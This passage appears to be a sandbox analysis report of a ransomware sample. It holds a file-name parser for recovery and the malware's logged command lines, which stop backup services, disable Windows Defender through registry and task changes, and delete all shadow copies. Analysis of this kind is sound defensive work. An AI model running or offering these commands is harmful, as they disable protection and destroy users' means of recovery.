File opened for modification C:\Program Files\7-Zip\Lang\ky.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_CgAAAAoAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_FgAAABYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
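Every renamed file in the list above follows the same layout: the original name, a dot, a 56-character base64url token, and the extension .p5rwm. The first 44 characters of the token are identical for every file in this detonation and the last 12 differ per file. The block below is an added example, not part of the report or of any published decryptor: it recovers the original path from an encrypted name, groups files by the shared token prefix, and decodes the per-file tail into its nine raw bytes. Reading those bytes as two little-endian 32-bit integers plus one trailing byte is an assumption made here because the values line up that way in the listing (for example JAAAACQAAAA0 gives 36, 36, 0x34); the report does not say what the fields mean.

```python
"""Parse the encrypted file names recorded in this report. Sample paths are
copied from the listing; the field interpretation in decode_tail is an assumption."""
import base64
import struct
from pathlib import PureWindowsPath

ENCRYPTED_EXT = ".p5rwm"   # extension appended to every renamed file in this run
TOKEN_LEN = 56             # base64url characters between the original name and the extension
PREFIX_LEN = 44            # characters that are identical across all files in the run


def split_encrypted_name(path):
    """Return (original_path, shared_prefix, per_file_tail), or None if the
    path does not carry the <name>.<token>.p5rwm layout seen in the report."""
    p = PureWindowsPath(path)
    if p.suffix.lower() != ENCRYPTED_EXT:
        return None
    stem = p.name[:-len(ENCRYPTED_EXT)]          # "<original name>.<token>"
    original, dot, token = stem.rpartition(".")
    if not dot or len(token) != TOKEN_LEN:
        return None
    return str(p.with_name(original)), token[:PREFIX_LEN], token[PREFIX_LEN:]


def decode_tail(tail):
    """Decode the 12 per-file characters to 9 bytes and unpack them as two
    little-endian uint32 values and one trailing byte (assumed layout)."""
    raw = base64.urlsafe_b64decode(tail)         # 12 chars -> exactly 9 bytes
    return struct.unpack("<IIB", raw)


def group_by_prefix(paths):
    """Group recovered original paths by the shared token prefix; one prefix
    per run is what this report's listing shows."""
    groups = {}
    for path in paths:
        parsed = split_encrypted_name(path)
        if parsed is None:
            continue                              # not renamed (e.g. classes.jsa above)
        original, prefix, tail = parsed
        groups.setdefault(prefix, []).append((original, decode_tail(tail)))
    return groups


SAMPLE_PATHS = [  # taken from the file list in this report
    r"C:\Program Files\7-Zip\Lang\ps.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm",
    r"C:\Program Files\Java\jdk1.8.0_66\lib\ct.sym.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm",
    r"C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JAAAACQAAAA0.p5rwm",
    r"C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa",
]

if __name__ == "__main__":
    for prefix, files in group_by_prefix(SAMPLE_PATHS).items():
        print(prefix, len(files), "files")
        for original, fields in files:
            print("  ", original, fields)
```

The practical use is on the recovery side: after a decryptor has been run (or when deciding which files a backup must replace), the original names come back from the encrypted names without touching file contents, and the shared prefix lets an analyst confirm that every file on a host belongs to the same encryption run.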

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3112 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 1344 wrote to memory of 3032 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1344 wrote to memory of 3032 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 424 wrote to memory of 1524 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 424 wrote to memory of 1524 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 2196 wrote to memory of 3572 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2196 wrote to memory of 3572 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3052 wrote to memory of 4064 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3052 wrote to memory of 4064 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3048 wrote to memory of 1008 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3048 wrote to memory of 1008 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3240 wrote to memory of 2748 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3240 wrote to memory of 2748 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 1308 wrote to memory of 1160 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1160 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 716 wrote to memory of 720 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 716 wrote to memory of 720 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 3112 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\net.exe
PID 1788 wrote to memory of 2200 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1788 wrote to memory of 2200 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3112 wrote to memory of 596 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 596 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\sc.exe
PID 3112 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe
PID 3112 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe

"C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12a0b" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12a0b" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12a0b" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

